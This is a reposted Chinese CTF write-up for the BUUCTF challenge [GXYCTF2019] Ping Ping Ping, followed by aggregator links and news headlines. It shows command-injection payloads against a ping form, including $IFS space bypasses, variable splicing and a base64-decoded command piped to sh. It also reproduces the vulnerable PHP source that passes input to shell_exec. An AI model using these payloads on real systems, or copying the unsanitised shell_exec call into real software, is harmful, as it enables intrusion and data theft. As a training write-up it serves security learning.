BUUCTF：[GXYCTF2019]Ping Ping Ping - 代码天地

BUUCTF：[GXYCTF2019]Ping Ping Ping

其他 2020-10-30 14:24:55 阅读次数: 0

题目地址：https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping

在这里插入图片描述

?ip=明显存在命令执行注入，使用;或者|闭合上一条命令

经过fuzz测试，过滤了空格、bash字符、flag字符、以及一些特殊符号

在这里插入图片描述

空格绕过这里使用$IFS$9

/?ip=;id;whoami;pwd;ls;ls$IFS$9-lha

在这里插入图片描述
我做题时用的是

/?ip=;cat$IFS$9`ls`

直接将当前目录下所有文件全部cat出来，查看源码发现flag

在这里插入图片描述
题目源码

<?php
if(isset($_GET['ip'])){
    
    
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    
    
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    
    
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    
    
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    
    
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}
?>

贴一下在网上看到的别的方法

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
.......

猜你喜欢

转载自blog.csdn.net/mochu7777777/article/details/109180116

BUUCTF：[GXYCTF2019]Ping Ping Ping

【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup

[GXYCTF2019]Ping Ping Ping

[BUUOJ][GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping 1

[BUUOJ记录] [GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping {命令执行总结}

[GXYCTF2019]Ping Ping Ping解题过程

BUUCTF_Web——[极客大挑战 2019]Secret File、[RoarCTF 2019]Easy Calc、[GXYCTF2019]Ping Ping Ping

ping

ping /?

BUUCTF-Ping Ping Ping

PING！PING！PING！连接世界！

ping ping ping HDU - 6203

ping命令

Ping 笔记

ping 网络

ping的技术

android ping

linux ping

Ping隧道

1、ping

ping脚本

PHP ping

禁ping

PING频道

Ping 命令

ping使用

ping 脚本

ping不通

今日推荐

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

周排行

返回指定时间格式

fopen函数中的mode参数

Java 单例模式探讨

Flex remoteobject工作原理探讨

寻找mplayer的便捷安装方法

30天了解30种技术系列---(26)MySQL自动化运维工具Inception

关于Jboss/Tomcat/Jetty的JNDI定义123

程序减肥，strip，eu-strip 及其符号表

AsyncTask、View.post(Runnable)、ViewTreeObserver三种方式总结frame animation自动启动

Json和Bean的互相转换

每日归档

更多

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)